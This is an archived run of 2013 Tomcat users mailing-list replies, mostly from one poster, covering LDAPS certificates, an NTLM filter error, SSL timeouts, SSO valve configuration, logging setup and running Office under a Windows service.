Daniel ...he hasn't imported his DER typed certificate into the LDAP Server yet.. Martin __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. Subject: Re: Cert From: dmik...@gopivotal.com Date: Fri, 2 Aug 2013 08:58:12 -0400 To: users@tomcat.apache.org On Aug 2, 2013, at 7:33 AM, Kyle Shattuck ky...@montcalm.edu wrote: Hello, I am using Tomcat 7 on a windows server 2012 build for this: https://wiki.jasig.org/display/CASUM/Best+Practice+-+Setting+Up+CAS+Locally+using+the+Maven2+WAR+Overlay+Method I don't think SSL is not working correctly because every time I try to authenticate over LDAPS it does not work. What part of this doesn't work? Connecting via SSL or authentication via LDAP? They are two different things. Can you connect to your server via HTTPS and access a static resource like an HTML page or image file? If not, what happens when you try to connect? I created a .csr and a .jks using the java keytool. I got a cert using my .csr file from digicert by downloading it to a .p7b file. I imported the .p7b file to my %jave_home%\bin\mykeystore.jks. I then download from digicert the same cert but in a .pem file and imported the file to my %jave_home5\jre\lib\security\cacerts. Did I miss something here, do you need any other info? - What is the specific version of Tomcat that you are using? - Do you see any errors in the log? - Include your server.xml, minus comments and minus any sensitive info like passwords Dan Thank you, Kyle - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Cert
Kyle the ldap server requires the LDAP Attributes contained within the p7b dn: cn=username,o=organization,c=country objectclass:inetorgperson objectclass:organizationalPerson cn: username sn: surname your LDAP admin has 2 options: 1)enter each one manually from the attributes enumerated from the cert 2) import your DER formatted certificate into LDAP (and let the import utility auto-populate the LDAP attributes) for example 2a)Cisco LDAP Server http://www.cisco.com/en/US/docs/switches/datacenter/sw/6_x/nx-os/security/configuration/guide/b_Cisco_Nexus_7000_NX-OS_Security_Configuration_Guide__Release_6.x_chapter_0111.html 2b)IBM LDAP Server http://pic.dhe.ibm.com/infocenter/tivihelp/v2r1/index.jsp?topic=%2Fcom.ibm.itamfbi.doc_5.1%2FADM51mst160.htm it looks like we will need to engage the LDAP admin to take this any further..can you cc him? Martin __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. From: ky...@montcalm.edu To: users@tomcat.apache.org Subject: RE: Cert Date: Fri, 2 Aug 2013 13:23:12 + My Server( CAS) is using SSL and the LDAP(DC) server uses SSL. So when I try to authenticate through my CAS server to DC over LDAPS it does not work. When I look at the logs of the Applications and Services Logs --Directory Service is says-- InformationActiveDirectory_DomainService1535LDAP Interface: Internal event: The LDAP server returned an error. Additional Data Error value: 0003: LdapErr: DSID-0C060463, comment: Error decrypting ldap message, data 0, v1db1 Tomcat version:apache-tomcat-7.0.42 -Original Message- From: Daniel Mikusa [mailto:dmik...@gopivotal.com] Sent: Friday, August 02, 2013 8:59 AM To: Tomcat Users List Subject: Re: Cert On Aug 2, 2013, at 7:33 AM, Kyle Shattuck ky...@montcalm.edu wrote: Hello, I am using Tomcat 7 on a windows server 2012 build for this: https://wiki.jasig.org/display/CASUM/Best+Practice+-+Setting+Up+CAS+Locally+using+the+Maven2+WAR+Overlay+Method I don't think SSL is not working correctly because every time I try to authenticate over LDAPS it does not work. What part of this doesn't work? Connecting via SSL or authentication via LDAP? They are two different things. Can you connect to your server via HTTPS and access a static resource like an HTML page or image file? If not, what happens when you try to connect? I created a .csr and a .jks using the java keytool. I got a cert using my .csr file from digicert by downloading it to a .p7b file. I imported the .p7b file to my %jave_home%\bin\mykeystore.jks. I then download from digicert the same cert but in a .pem file and imported the file to my %jave_home5\jre\lib\security\cacerts. Did I miss something here, do you need any other info? - What is the specific version of Tomcat that you are using? - Do you see any errors in the log? - Include your server.xml, minus comments and minus any sensitive info like passwords Dan Thank you, Kyle - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: java.net.UnknownHostException: Failed to negotiate with a suitable domain controller for xxx
nslookup DomainName if you still call no joy there is nothing we can do (without contacting your Domain Admin and asking if DomainName is live) Martin __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. From: seema...@hotmail.com To: users@tomcat.apache.org Subject: RE: java.net.UnknownHostException: Failed to negotiate with a suitable domain controller for xxx Date: Thu, 1 Aug 2013 12:02:34 +0100 Date: Thu, 1 Aug 2013 12:06:39 +0200 From: a...@ice-sa.com To: users@tomcat.apache.org Subject: Re: java.net.UnknownHostException: Failed to negotiate with a suitable domain controller for xxx Seema Patel wrote: Hi, I am not sure if this is the right List to post this on, please advise if it isn't and let me know where is best to post. I am getting the following error on one of our applications running on our intranet: 2013-07-31 17:15:11,180 [http-xxx.xxx.x.xxx-xx-x] ERROR org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/forms].[action] - Servlet.service() for servlet action threw exception java.net.UnknownHostException: Failed to negotiate with a suitable domain controller for xxx.LOCAL at jcifs.smb.SmbSession.getChallengeForDomain(SmbSession.java:187) at jcifs.http.NtlmHttpFilter.negotiate(NtlmHttpFilter.java:150) at jcifs.http.NtlmHttpFilter.doFilter(NtlmHttpFilter.java:114) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:172) at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:465) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.authenticator.SingleSignOn.invoke(SingleSignOn.java:393) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:174) at org.apache.coyote.http11.Http11AprProcessor.process(Http11AprProcessor.java:837) at org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler.process(Http11AprProtocol.java:640) at org.apache.tomcat.util.net.AprEndpoint$Worker.run(AprEndpoint.java:1287) at java.lang.Thread.run(Unknown Source) I believe that you should read this page carefully, in particular the blue text at the beginning : http://jcifs.samba.org/src/docs/ntlmhttpauth.html Can you have a look at the WEB-INF/web.xml file *of your application*, and check if there is a servlet filter configured there, which matches the name above ? If so, make a backup copy of that web.xml file, and then edit it to remove that filter from it, and try again. I am not quite sure, but it looks possible to me that you have a duplicate authentication mechanism in use : one at the container (Tomcat) level, and one at the application level. And the one used at the application level is obsolete, unsupported, unmaintained etc.. I have found out that JCIFS is no longer supported, but it will take a lot of time, development and resources to update it to the recommended Jespa. In my web.xml file I have the following: filter filter-nameNtlmHttpFilter/filter-name filter-classjcifs.http.NtlmHttpFilter/filter-class !-- always needed for preauthentication / SMB signatures -- init-param param-namejcifs.smb.client.domain/param-name param-valuexxx/param-value /init-param !-- SMB message signing
RE: SSL and 408 error code (incomplete request)
what happens if you increase the connectionTimeout (on your ssl connector) to a longer interval e.g.? $CATALINA_HOME/conf/server.xml Connector port=8443 protocol=HTTP/1.1 SSLEnabled=true connectionTimeout=3 Martin __ Verzicht und Vertraulichkeitanmerkung Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Date: Wed, 31 Jul 2013 14:32:39 -0700 From: solmy...@yahoo.com Subject: SSL and 408 error code (incomplete request) To: users@tomcat.apache.org Hi, Has anyone happened to stumble onto this issue, please: Our Ajax works perfectly as long as its non-secure. However, when switching to SSL we sometimes see 408 errors (incomplete request). This only happens on ajax, and inconsistently (similar requests might succeed on one moment, but fail on the other). Please note: 1. Our client is Chrome browser, using JQuery for ajax 2. Server is Tomcat 7 3. Network is fast and stable, and the ajax requests are small 4. Problem occurs for both our connectors: APR and Http (both with SSL enabled) 5. Our x509 certificate is valid (otherwise it would have failed on *all* ajax ssl requests, not to mention the non-ajax ssl) Thanks :) - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: OSGi in Tomcat
asking your release manager to build an OSGI artifact with eclipse may be a bit of a stretch if this is a live production-ready system then you will most likely be building at command-line with either ant or maven the trickiest part is interfacing to BND start and BND stop which can be accomplished with Activator sample code seen here http://wso2.com/library/tutorials/develop-osgi-bundles-using-maven-bundle-plugin lets pick this thread on us...@maven.apache.org Martin __ /Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. Date: Wed, 24 Jul 2013 13:30:01 +0300 Subject: Re: OSGi in Tomcat From: miles...@gmail.com To: users@tomcat.apache.org 2013/7/23 Leonardo Torres wrote: Thank´s for reply. Just one more question, If I want to use tomcat inside of OSGi environment, how can I do that ? Check Gemini Web documentation: http://www.eclipse.org/gemini/web/documentation/ http://wiki.eclipse.org/Gemini/Web Regards Violeta
RE: OT: How to use JSP outside of tomcat
Documentation hasnt caught up with functionality so its catch as catch can but this should get you to what you need pom.xml project modelVersion4.0.0/modelVersion groupIdfu/groupId artifactIdbar/artifactId plugins plugin groupIdorg.codehaus.mojo.jspc/groupId artifactIdjspc-maven-plugin/artifactId configuration includeInProjectfalse/includeInProject sources directory${basedir}/myapp/src/main/webapp//directory includes include**/*.jsp/include /includes /sources source1.6/source target1.6/target executions execution goals goalcompile/goal /goals /execution /executions /plugin /plugins /build ... /project mvn -e -X compile http://mojo.codehaus.org/jspc/jspc-compilers/jspc-compiler-tomcat6/index.html http://mojo.codehaus.org/jspc/jspc-maven-plugin/usage.html HTH Martin Gainty __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. Date: Wed, 24 Jul 2013 13:22:36 -0400 Subject: OT: How to use JSP outside of tomcat From: aryeh.fried...@gmail.com To: users@tomcat.apache.org I have a number of documents that are very template like and ideal for JSP that are 1) not intended for the web and 2) need to be automatically batch processed (the output stored in output files). How do I call the JSP processor from them command line? (it takes tomcat too long to see updated files for the purpose I have in mind) - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: SingleSignOn valve enabled by default?
NO: !-- /conf/server.xml -- !-- SingleSignOn valve, share authentication between web applications Documentation at: /docs/config/valve.html -- !-- Valve className=org.apache.catalina.authenticator.SingleSignOn / -- YES: !-- /conf/server.xml -- !-- SingleSignOn valve, share authentication between web applications Documentation at: /docs/config/valve.html -- Valve className=org.apache.catalina.authenticator.SingleSignOn / Martin __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. Date: Fri, 19 Jul 2013 20:16:32 +0800 From: soul2zim...@gmail.com To: users@tomcat.apache.org Subject: SingleSignOn valve enabled by default? Hi all, I have an issue with SSO configuration in tomcat 7.0.42. According to the doc [1], it requires to enable SSO valve inside server.xml. However, without making such modification, I deployed two web-app test.war and test2.war (see attached file). Then, try to login from /test, after successful login, I don't need to login a second time for /test2 and can see the secured welcome page directly . That's strange for me, is the SingleSignOn valve enabled by default in tomcat? FYI, I add following configuration in tomcat-user.xml role rolename=User/ user username=test password=pass.1234 roles=User/ If it's not a real issue, please point me how that works, and I'd like to know how could I set the reauthenticate parameter for SSO. [1] http://tomcat.apache.org/tomcat-7.0-doc/config/host.html#Single_Sign_On Thanks Regards, - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: ClassNotFoundException org.apache.juli.FileHandler in Tomcat 7.0.42 / OpenJDK 6 b27 (FreeBSD)
Matthias MGthis is what $CATALINA_HOME/conf/logging.properties is SUPPOSED to look like # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the License); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an AS IS BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. handlers = 1catalina.org.apache.juli.FileHandler, 2localhost.org.apache.juli.FileHandler, 3manager.org.apache.juli.FileHandler, 4host-manager.org.apache.juli.FileHandler, java.util.logging.ConsoleHandler .handlers = 1catalina.org.apache.juli.FileHandler, java.util.logging.ConsoleHandler # Handler specific properties. # Describes specific configuration info for Handlers. 1catalina.org.apache.juli.FileHandler.level = FINE 1catalina.org.apache.juli.FileHandler.directory = ${catalina.base}/logs 1catalina.org.apache.juli.FileHandler.prefix = catalina. 2localhost.org.apache.juli.FileHandler.level = FINE 2localhost.org.apache.juli.FileHandler.directory = ${catalina.base}/logs 2localhost.org.apache.juli.FileHandler.prefix = localhost. 3manager.org.apache.juli.FileHandler.level = FINE 3manager.org.apache.juli.FileHandler.directory = ${catalina.base}/logs 3manager.org.apache.juli.FileHandler.prefix = manager. 4host-manager.org.apache.juli.FileHandler.level = FINE 4host-manager.org.apache.juli.FileHandler.directory = ${catalina.base}/logs 4host-manager.org.apache.juli.FileHandler.prefix = host-manager. java.util.logging.ConsoleHandler.level = FINE java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter # Facility specific properties. # Provides extra control for each logger. org.apache.catalina.core.ContainerBase.[Catalina].[localhost].level = INFO org.apache.catalina.core.ContainerBase.[Catalina].[localhost].handlers = 2localhost.org.apache.juli.FileHandler org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/manager].level = INFO org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/manager].handlers = 3manager.org.apache.juli.FileHandler org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/host-manager].level = INFO org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/host-manager].handlers = 4host-manager.org.apache.juli.FileHandler # For example, set the org.apache.catalina.util.LifecycleBase logger to log # each component that extends LifecycleBase changing state: #org.apache.catalina.util.LifecycleBase.level = FINE Date: Sat, 13 Jul 2013 20:04:15 +0200 From: matth...@petermann-it.de To: users@tomcat.apache.org Subject: Re: ClassNotFoundException org.apache.juli.FileHandler in Tomcat 7.0.42 / OpenJDK 6 b27 (FreeBSD) Am 13.07.2013 16:07, schrieb Konstantin Kolinko: 2013/7/13 Konstantin Kolinko knst.koli...@gmail.com: 2013/7/13 Matthias Petermann matth...@petermann-it.de: Hello, when I try to start Tomcat 7.0.42 with OpenJDK 6 b27, it complains about not finding classes for the logging handlers. I created a minimal logging.properties to narrow down the problem: handlers = 1catalina.org.apache.juli.FileHandler, java.util.logging.ConsoleHandler .handlers = java.util.logging.ConsoleHandler 1catalina.org.apache.juli.FileHandler.level = FINE 1catalina.org.apache.juli.FileHandler.directory = ${catalina.base}/logs 1catalina.org.apache.juli.FileHandler.prefix = catalinatest. java.util.logging.ConsoleHandler.level = FINE java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter org.apache.catalina.core.ContainerBase.[Catalina].[localhost].level = INFO org.apache.catalina.core.ContainerBase.[Catalina].[localhost].handlers = 1catalina.org.apache.juli.FileHandler The output of ./catalina.sh run is the following: INFO: Starting Servlet Engine: Apache Tomcat/7.0.42 Can't load log handler 1catalina.org.apache.juli.FileHandler java.lang.ClassNotFoundException: 1catalina.org.apache.juli.FileHandler java.lang.ClassNotFoundException: 1catalina.org.apache.juli.FileHandler at java.net.URLClassLoader$1.run(URLClassLoader.java:217) at java.security.AccessController.doPrivileged(Native Method)
RE: Memory limits for children processes when running Tomcat as service?
When you run your MS app standalone how much heap, stack does this process occupy? When TC startsup how much heap,stack is left over for the standalone Microsoft app? If youre not going to powerup your machine with 8GB RAM and at least tera of storage your only solution is to configure your Microsoft Compound Documents be opened, read and written using POI https://poi.apache.org/ Keep us apprised, Martin From: j.tosov...@email.cz To: users@tomcat.apache.org Subject: RE: Memory limits for children processes when running Tomcat as service? Date: Thu, 27 Jun 2013 21:24:03 +0200 On 2013-06-27 André Warnier wrote: honyk wrote: On 2013-06-26 André Warnier wrote: honyk wrote: Dear All, I have a JSF2.0 app that executes (via ProcessBuilder) an external script. This script opens PPTX via PowerPoint ActiveX object, manipulate it and save. It runs on Windows Server 2008 R2 64-bit, 4GB RAM, JDK 7. When tomcat 7 is launched using startup.bat (with original settings), it works fine. When tomcat runs as a service, opening the PPTX in the PowerPoint fails because of Out Of Memory error regardless Xmx settings (tomcat7w.exe). I originally asked PowerPoint forum, but haven't get any explanation yet: http://answers.microsoft.com/thread/37cbebf6-4003-4ab0-9295- 92413aaecc2e But as the entry point is Tomcat and the only difference between problematic and non problematic behavior is the 'service' mode, maybe there is something related in the tomcat7.exe code base. Just guessing. Has anybody an idea why both modes behave differently? Hi. The problem has nothing to do with Tomcat per se. It is due to running a Microsoft Office program (or library modules such as the Interop series) as a sub-process of a Windows Service (and thus in the same Service context) which is something that is not in the design of Microsoft Office, not supported by Microsoft, and even actively discouraged by Microsoft. See : http://support.microsoft.com/kb/257757 The problem is basically that a Windows Service does not run in the same environment as a user session environment, and as they say in that article, you will certainly experience unstable behavior and/or deadlock somewhere, and will get no help for it. I read this article but because I do not need intraction and my code doesn't run simultaneously and tomcat is launched using my credentials - I still thought it could be possible. Now realizing that tomcat launched using my credentials do not necesarily mean that Office use the same... Personal experience : some things will work with one MS-Office program, and totally fail with another; even simple things like opening or saving a file. It may work with one file, and fail with another, for no apparent reason. You get an OOM error in this case, but other cases may be file not found (although it's there) or whatever other bizarre failures. Ultimately it is unpredictable, frustrating and time-consuming. I was an optimist when everything worked in the user mode... Solutions : 1) instead of MS-Office, use LibreOffice or OpenOffice. Both can run in headless mode, and provide an API to have them do things with documents. And both can open and manipulate MS-Office documents. Depending on what you do, there may be some differences in the results, but it works fine for many things. Or try one of the other solutions suggested in the above article. (I have not tried them, I use OpenOffice/LibreOffice). I'll give it a try. I originaly tested Apache POI, but required functionality is not implemented yet. 2) do not run Tomcat as a Service. Create a virtual Windows machine, and run it in a user console (with startup.bat). You can restrict access to the VM, and since it is a VM, it can run unattended, just as a service would. (I am also using this scheme, when circumstances permit). But in that case, also pay attention to the licensing considerations at the end of the article. I am quite lost in this ;-) But I'll investigate further. Thanks a lot for your exhaustive analysis! Finally it looks my way is no way :-) No problem. I went myself through the exact same issues as you described, I did believe that there must be a workaround, tried a number of things with great loss of time, and finally had to admit that the MS article was right and that there is no good solution with MS-Office when starting it from a Service. I appreciate a lot your response and sharing your experience. Without it I would spend many additional hours of investigating, trial and error attempts, asking the same topic in different places, all this in heavy frustration... About the Virtual Machine solution : usually, when you want something
RE: forward request by changing the port in request url
for IP Redirecting and or automatic Network Address Translations (e.g. Port 80 redirects to Port 81) you will need a proxy server please contact supp...@cisco.com for product and service options Viel Gluck Martin __ Verzicht und Vertraulichkeitanmerkung Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. From: anigo...@cisco.com To: users@tomcat.apache.org Subject: forward request by changing the port in request url Date: Thu, 13 Jun 2013 18:00:12 + i have two service running under tomcat. One service is default i.e. catalina on port 8080 and 8443 second service is catalina_new on port 8081 and 8444. i have application abc.war deployed in webapps_new service which is running on port 8081. This application is not there in webapps. i want if any request coming on port 8080 for application abc, it is forwarded to port 8081.(same for ssl port 8443-8444) Is there any way to do the same. Thanks Anil
RE: Class cast exception when starting tomcat 7.0.1
you can swap out one jar for another Ant has no idea which container it is communicating with unless you tell it catalina.jar is tied to the Servlet Spec so you cannot change catalina unless you change the accompanying Servlet Spec so you've already done that why not write a Quick and Dirty ant taskdef I'll pick this up on us...@ant.apache.org Viel Gluck Martin Gainty __ Jogi és Bizalmassági kinyilatkoztatás/Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Ez az üzenet bizalmas. Ha nem ön az akinek szánva volt, akkor kérjük, hogy jelentse azt nekünk vissza. Semmiféle továbbítása vagy másolatának készítése nem megengedett. Ez az üzenet csak ismeret cserét szolgál és semmiféle jogi alkalmazhatósága sincs. Mivel az electronikus üzenetek könnyen megváltoztathatóak, ezért minket semmi felelöség nem terhelhet ezen üzenet tartalma miatt. Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. From: jm...@rocketsoftware.com To: users@tomcat.apache.org Subject: RE: Class cast exception when starting tomcat 7.0.1 Date: Thu, 13 Jun 2013 20:19:07 + I had catalina.jar in WEB-INF/lib. It's needed because we have an implementation of Realm to store an encrypted tomcat password users enter in the webapp. If I remove it and add the catalina.jar from tomcat_home/lib to the classpath, I have to change the signature from org.apache.catalina.realm.RealmBase.Digest(String, String) to org.apache.catalina.realm.RealmBase.Digest(String, String, String). Then the code compiles ok, but I get this error when building with ant to make a war file: error: method Digest in class RealmBase cannot be applied to given types; [javac] encryptedOldPwd = RealmBase.Digest(oldTomcatPassword, digestAlg,null); Should I not be writing code that needs classes from catalina.jar? Thanks, Jane -Original Message- From: Christopher Schultz [mailto:ch...@christopherschultz.net] Sent: Thursday, June 13, 2013 11:09 AM To: Tomcat Users List Subject: Re: Class cast exception when starting tomcat 7.0.1 -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Jane, On 6/13/13 12:38 PM, Jane Muse wrote: In the archives I thought the only unreleased versions would be specified beta. Please let me know if this is not the case. I'll admit it's not clear from the version number which versions are beta, released, etc. You have to look at the ChangeLog: http://tomcat.apache.org/tomcat-7.0-doc/changelog.html Each release contains a release date and (optionally) a comment on the quality of the build. The first non-beta version of Tomcat 7.0.x was 7.0.6. Tomcat 7.0.1 (distinct from 7.0.10) was actually not released probably because it was broken for some reason. When the Tomcat team rolls a release, there is a vote. If there aren't enough yes votes (or any no votes), the release is abandoned but the number isn't re-used. Anyhow, there's no reason to attempt to migrate from Tomcat 6.0.x to Tomcat 7.0.x by shooting for an early version of Tomcat 7.0.x: you should go for the latest. Also, if you mistype and say Tomcat 7.0.1 instead of Tomcat 7.0.10 or Tomcat 7.0.4 instead of Tomcat 7.0.40 (or Tomcat 7.0.41), don't get an offended when people tell you you are doing it wrong. Just say whoops, I meant 7.0.40 and move on. Back to your original problem... have you modified the Tomcat 7 installation in any way -- other than dropping your WAR file/exploded WAR into the webapps/ directory)? Also, do you have any Tomcat-related JAR files in your webapp's WEB-INF/lib directory? - -chris -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJRugqsAAoJEBzwKT+lPKRYkwcQALdDoGGk6ZNHg82Ow8vTjjrY dO/70UaIg69t4TsgIJApzd+ReSMbzrThby4Ok+EkYOEXLC1tZgbbQpTQdx0sjqXc k7fJl9oRQ/O9UP4lj+PR1iWL0zTX/Ze+eTQLIHiJ6rpNnyqgSOnZujsev1lbbaUZ A2w8GwiWOPvA17MIQUio1Rr/OKd6s7/02EKJQwbxIRoBh4jdaTalgJXCBKb5+60p
RE: Customizing SSL in HttpClient
